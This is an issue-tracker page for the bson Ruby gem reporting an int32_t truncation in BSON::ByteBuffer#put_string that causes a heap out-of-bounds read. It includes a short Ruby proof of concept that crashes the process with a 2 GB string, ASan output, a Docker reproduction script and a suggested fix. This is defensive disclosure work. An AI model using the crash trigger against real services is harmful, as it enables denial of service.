Loading...

XML

Word

Printable

JSON

Type: Bug
Resolution: Fixed
Priority: Unknown
Fix Version/s: bson-5.2.1
Affects Version/s: None
Component/s: BSON
Labels:
None

Confidence Status:
None

Backwards Compatibility:
Fully Compatible

Assigned Teams:

Ruby Drivers

Documentation Changes:
Not Needed

Aha! Reference:
None
Tracking Level:
None
Risk Status:
None
Exec Notes:
None
Goal Link:
None
Goal Name(s):
None

Summary

BSON::ByteBuffer#put_string truncates Ruby string lengths to int32_t before UTF-8 validation. A string of length 2**31 wraps negative, is converted to a huge size_t, and drives the native UTF-8 validator past the end of the heap allocation.

Affected version

Software: bson gem
Version: 5.2.0
Commit: dcae7f483a262305159ae8b2711cf359f7d9af65

Details

The native string encoder uses int32_t length to receive the result of RSTRING_LEN, even though Ruby strings can be larger than INT32_MAX.

ext/bson/write.c:209

static VALUE pvt_bson_encode_to_utf8(VALUE string) {
  VALUE existing_encoding_name;
  VALUE encoding;
  VALUE utf8_string;
  const char *str;
  int32_t length;
...
    str = RSTRING_PTR(utf8_string);
    length = RSTRING_LEN(utf8_string);

    rb_bson_utf8_validate(str, length, true, "String");

RSTRING_LEN returns long (64-bit on modern platforms). Assigning it to int32_t silently truncates any string of 2 GB or more. A string of exactly 2**31 bytes produces INT32_MIN (-2147483648). That value is passed directly to rb_bson_utf8_validate, whose second parameter is size_t:

ext/bson/libbson-utf8.c:105

void
rb_bson_utf8_validate (const char *utf8,
                       size_t utf8_len,
                       bool allow_null,
                       const char *data_type)
{
...
   for (i = 0; i < utf8_len; i += seq_length) {
      _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask);

The implicit conversion of a negative int32_t to size_t wraps to a value near UINT64_MAX. The loop then iterates far past the end of the string, and the first byte read in _bson_utf8_get_sequence is performed out of bounds:

ext/bson/libbson-utf8.c:40

   unsigned char c = *(const unsigned char *) utf8;

Proof of concept

require "bson"

buffer = BSON::ByteBuffer.new
huge = "A" * (2**31)
warn huge.bytesize
buffer.put_string(huge)

AddressSanitizer output

==859==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xffff75bfe801
READ of size 1 at 0xffff75bfe801 thread T0
    #0 0xffff97dafa5c in _bson_utf8_get_sequence /tmp/src/ext/bson/libbson-utf8.c:40
    #1 0xffff97dafc78 in rb_bson_utf8_validate /tmp/src/ext/bson/libbson-utf8.c:121
    #2 0xffff97db71b8 in pvt_bson_encode_to_utf8 /tmp/src/ext/bson/write.c:226
    #3 0xffff97db73c8 in rb_bson_byte_buffer_put_string /tmp/src/ext/bson/write.c:243

0xffff75bfe801 is located 0 bytes to the right of 2147483649-byte region
SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/src/ext/bson/libbson-utf8.c:40
         in _bson_utf8_get_sequence

Reproduction

On a machine with Docker, run:

mkdir -p dfvuln-772-bson-put-string-oob
cd dfvuln-772-bson-put-string-oob
cat > poc_put_string_oob.rb <<'RUBY'
require "bson"

buffer = BSON::ByteBuffer.new
huge = "A" * (2**31)
warn huge.bytesize
buffer.put_string(huge)
RUBY

docker run --rm -v "$PWD":/work -w /work ruby:3.3-bookworm bash -lc '
set -eux
apt-get update -qq
apt-get install -y -qq git build-essential pkg-config >/dev/null
git clone --depth=1 https://github.com/mongodb/bson-ruby.git src
cd src
git rev-parse HEAD | tee /work/commit.txt
bundle config set path vendor/bundle
bundle install
cd ext/bson
make distclean >/dev/null 2>&1 || true
ruby extconf.rb --with-cflags="-O0 -g -fsanitize=address -fno-omit-frame-pointer" \
                --with-ldflags="-fsanitize=address"
make -j"$(nproc)"
cd ../..
cp ext/bson/bson_native.so lib/
ASAN_LIB=$(gcc -print-file-name=libasan.so)
set +e
LD_PRELOAD="$ASAN_LIB" \
  ASAN_OPTIONS="detect_leaks=0:abort_on_error=0:symbolize=1" \
  ruby -Ilib /work/poc_put_string_oob.rb 2>&1 | tee /work/asan.log
status=${PIPESTATUS[0]}
set -e
test "$status" -ne 0
grep -q "ERROR: AddressSanitizer: heap-buffer-overflow" /work/asan.log
'

This builds bson_native.so with ASan inside Docker, runs the PoC, and writes the raw sanitizer output to asan.log.

Independent confirmation

The report was reviewed against the current source tree at commit dcae7f483a262305159ae8b2711cf359f7d9af65. The defect is confirmed.

ext/bson/write.c contains two sites where RSTRING_LEN is assigned to int32_t: lines 214 and 241 (inside pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string respectively). On a 64-bit host, RSTRING_LEN returns long. The truncation is silent – no compiler warning, no runtime check. Passing the resulting negative value to rb_bson_utf8_validate (which takes size_t) is the direct cause of the out-of-bounds read described above.

Severity assessment

Low to Medium. The crash is real and reproducible as described. Practical exploitability is constrained by the requirement to allocate and pass a string of at least 2 GB. MongoDB drivers enforce a 16 MB per-document limit at a higher layer, so this path is unreachable in standard MongoDB usage. In contexts where the bson gem is used directly and no upstream size limit is enforced, an attacker who can supply a large enough string could crash the process. The impact is a heap out-of-bounds read, not a write; reliable code execution is not a plausible outcome on hardened platforms.

Suggested fix

In both pvt_bson_encode_to_utf8 and rb_bson_byte_buffer_put_string, change the length variable from int32_t to long (matching RSTRING_LEN's return type). Add an explicit bounds check before calling rb_bson_utf8_validate and before writing the 4-byte length prefix (BSON string length is encoded as int32_t, so strings longer than INT32_MAX bytes are invalid BSON regardless):

long length = RSTRING_LEN(utf8_string);
if (length > INT32_MAX) {
    rb_raise(rb_eArgError, "String length %ld exceeds BSON maximum", length);
}

Assignee:: Jamis Buck
Reporter:: Jamis Buck
Votes:: 0 Vote for this issue
Watchers:: 1 Start watching this issue

Created:: Jun 03 2026 03:51:55 PM UTC
Updated:: Jun 08 2026 02:22:08 PM UTC
Resolved:: Jun 08 2026 02:22:08 PM UTC

Details

Description

Summary

Affected version

Details

Proof of concept

AddressSanitizer output

Reproduction

Independent confirmation

Severity assessment

Suggested fix

Attachments

Activity

People

Dates